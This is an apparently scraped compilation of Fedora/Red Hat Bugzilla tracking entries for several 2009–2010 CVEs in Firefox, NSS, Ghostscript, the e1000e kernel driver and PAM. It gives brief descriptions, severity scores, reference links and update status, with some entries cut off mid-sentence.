Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=599
Bugzilla
CVE-2009-5017 Firefox: overlong UTF-8 seqence detection problem
bugzilla·2010-11-23·CVSS 4.3
CVE-2009-5017 [MEDIUM] CVE-2009-5017 Firefox: overlong UTF-8 seqence detection problem
CVE-2009-5017 Firefox: overlong UTF-8 seqence detection problem
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-5017 to
the following vulnerability:
Mozilla Firefox before 3.6 Beta 3 does not properly handle overlong UTF-8
encoding, which makes it easier for remote attackers to bypass cross-site
scripting (XSS) protection mechanisms via a crafted string, a different
vulnerability than CVE-2010-1210.
References:
[1] http://sirdarckcat.blogspot.com/2009/10/couple-of-unicode-issues-on-php-and.html
[2] http://hg.mozilla.org/releases/mozilla-1.9.2/rev/e42c563313a0
[3] https://bugzilla.mozilla.org/show_bug.cgi?id=511859
[4] https://bugzilla.mozilla.org/show_bug.cgi?id=522634
Reference public PoC:
[5] https://bugzilla.mozilla.org/show_bug.cgi?id=511859#c1
Upstream change
Bugzilla
CVE-2010-3170 firefox/nss: doesn't handle IP-based wildcards in X509 certificates safely
bugzilla·2010-09-03·CVSS 5.9
CVE-2010-3170 [MEDIUM] CVE-2010-3170 firefox/nss: doesn't handle IP-based wildcards in X509 certificates safely
CVE-2010-3170 firefox/nss: doesn't handle IP-based wildcards in X509 certificates safely
Richard Moore and Simon Ward reported flaws in the way browsers such
as Firefox handled wildcard characters in the Common Name field of
a certificate. If an attacker is able to get a carefully-crafted certificate,
signed by a Certificate Authority trusted by Firefox, the attacker could
use the certificate during the man-in-the-middle attack and potentially
confuse Firefox into accepting it by mistake. Different vulnerability than
CVE-2009-2408.
References:
[1] http://www.westpoint.ltd.uk/advisories/wp-10-0001.txt
[2] http://bugs.gentoo.org/show_bug.cgi?id=335731
Discussion:
This will be fixed in NSS 3.12.8
---
Mozilla has assigned CVE-2010-3170 identifier to this issue.
Mozilla upstream bug:
[3]
Bugzilla
CVE-2009-4897 ghostscript: long name buffer overflow (GS 8.64)
bugzilla·2010-07-12·CVSS 9.3
CVE-2009-4897 [CRITICAL] CVE-2009-4897 ghostscript: long name buffer overflow (GS 8.64)
CVE-2009-4897 ghostscript: long name buffer overflow (GS 8.64)
A memory corruption vulnerability caused by long names was discovered [1] in Ghostscript 8.64 and earlier. A specially crafted PDF file could result in the execution of arbitrary code if opened or printed (i.e. via CUPS).
This was corrected in upstream Ghostscript 8.70 [2], version 8.64 and previous are affected by this flaw (all the way back to Ghostscript 7.05).
References:
[1] http://bugs.ghostscript.com/show_bug.cgi?id=690523
[2] http://svn.ghostscript.com/viewvc?view=rev&revision=9797
Discussion:
This problem is similar to CVE-2010-1869 (bug #582300) as was noted in oss-security thread:
http://thread.gmane.org/gmane.comp.security.oss.general/3184
(In reply to comment #0)
> This was corrected in upstream Ghostscript
Bugzilla
CVE-2009-4538 kernel: e1000e frame fragment issue
bugzilla·2009-12-29·CVSS 10.0
CVE-2009-4538 [CRITICAL] CVE-2009-4538 kernel: e1000e frame fragment issue
CVE-2009-4538 kernel: e1000e frame fragment issue
Description of problem:
Similar to the second issue that Fab mentioned in his presentation at 26c3, this affects the e1000e driver. See https://bugzilla.redhat.com/show_bug.cgi?id=550907#c0 issue #2 for the description, and this https://bugzilla.redhat.com/show_bug.cgi?id=550907#c4. This bug is filed to make sure we fix this too.
http://www.securityfocus.com/bid/37523
Discussion:
A quick heads up to all the release owners on this bug, the patch I posted upstream for bz 550915 (specifically the e1000 bits) will apply pretty cleanly to e1000e here.
---
This issue has been addressed in following products:
Red Hat Enterprise Linux 5
Via RHSA-2010:0019 https://rhn.redhat.com/errata/RHSA-2010-0019.html
---
This issue has been addressed
Bugzilla
CVE-2009-0579 pam: MINDAYS not respected by pam for password changing [F10]
bugzilla·2009-02-24·CVSS 4.6
CVE-2009-0579 [MEDIUM] CVE-2009-0579 pam: MINDAYS not respected by pam for password changing [F10]
CVE-2009-0579 pam: MINDAYS not respected by pam for password changing [F10]
F10 tracking bug: see blocks bug list for full details of the security issue(s).
[bug automatically created by: add-tracking-bugs]
Discussion:
You can eventually use the following link to create the update request:
https://admin.fedoraproject.org/updates/new/?request=Stable&type_=security&release=Fedora%2010&bugs=487217,
---
pam-1.0.4-2.fc9 has been submitted as an update for Fedora 9.
http://admin.fedoraproject.org/updates/pam-1.0.4-2.fc9
---
pam-1.0.4-2.fc10 has been submitted as an update for Fedora 10.
http://admin.fedoraproject.org/updates/pam-1.0.4-2.fc10
---
pam-1.0.4-2.fc10 has been pushed to the Fedora 10 testing repository. If problems still persist, please make note of it in this bug report.
I
http://secunia.com/advisories/35039http://www.securityfocus.com/archive/1/503477/100/0/threadedhttp://www.securityfocus.com/bid/34935http://www.vupen.com/english/advisories/2009/1306https://www.exploit-db.com/exploits/8671http://secunia.com/advisories/35039http://www.securityfocus.com/archive/1/503477/100/0/threadedhttp://www.securityfocus.com/bid/34935http://www.vupen.com/english/advisories/2009/1306https://www.exploit-db.com/exploits/8671
2009-06-08
Published